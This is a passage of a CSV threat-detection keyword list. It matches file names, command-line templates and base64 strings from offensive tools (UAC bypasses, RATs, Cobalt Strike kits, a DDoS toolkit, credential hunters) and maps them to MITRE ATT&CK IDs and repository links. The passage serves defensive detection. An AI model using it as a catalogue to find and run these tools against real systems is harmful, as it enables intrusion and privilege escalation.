TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac_bypass_bluetooth_win10.lua*",".{0,1000}uac_bypass_bluetooth_win10\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*uac_easinvoker.*",".{0,1000}uac_easinvoker\..{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*UACBypass -*",".{0,1000}UACBypass\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*UAC-bypass*",".{0,1000}UAC\-bypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf 
https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Uacbypass.dll*",".{0,1000}Uacbypass\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*UACBypass.My*",".{0,1000}UACBypass\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*uacbypass_files*",".{0,1000}uacbypass_files.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*UACBypass-BOF*",".{0,1000}UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*UACBypassCMSTP.ps1*",".{0,1000}UACBypassCMSTP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - 
T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*UACBypassConfig.java*",".{0,1000}UACBypassConfig\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*UACBypassedService.exe*",".{0,1000}UACBypassedService\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*UACBypassTest.txt*",".{0,1000}UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*uacm4gic*",".{0,1000}uacm4gic.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*UACME-master*",".{0,1000}UACME\-master.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*uac-schtasks *",".{0,1000}uac\-schtasks\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*uac-schtasks*",".{0,1000}uac\-schtasks.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*uac-silentcleanup*",".{0,1000}uac\-silentcleanup.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*uac-token-duplication*",".{0,1000}uac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*UACTokenManipulationManager.cs*",".{0,1000}UACTokenManipulationManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*uaf2john.*",".{0,1000}uaf2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*uberfile --lhost* --lport * --target-os * --downloader *",".{0,1000}uberfile\s\-\-lhost.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-target\-os\s.{0,1000}\s\-\-downloader\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ubuntu:dnscrypt-msi*",".{0,1000}ubuntu\:dnscrypt\-msi.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*udmp-parser-main*",".{0,1000}udmp\-parser\-main.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*UDVC-Server.exe -c * -i 127.0.0.1*",".{0,1000}UDVC\-Server\.exe\s\-c\s.{0,1000}\s\-i\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a 
DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","247","55","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" "*UFONet*",".{0,1000}UFONet.{0,1000}","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","2085","587","2023-10-10T15:31:41Z","2013-06-18T18:11:25Z" "*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*",".{0,1000}UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*",".{0,1000}UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*",".{0,1000}UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*uhttpsharp.*",".{0,1000}uhttpsharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*ui\sAINT.java*",".{0,1000}ui\\sAINT\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*uknowsec/TailorScan*",".{0,1000}uknowsec\/TailorScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*UlBDIFNlcnZlciBIb3N0*",".{0,1000}UlBDIFNlcnZlciBIb3N0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UlBDIFNlcnZlciBQb3J0*",".{0,1000}UlBDIFNlcnZlciBQb3J0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Ullaakut/Gorsair*",".{0,1000}Ullaakut\/Gorsair.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*UltraSnaffCore.csproj*",".{0,1000}UltraSnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - 
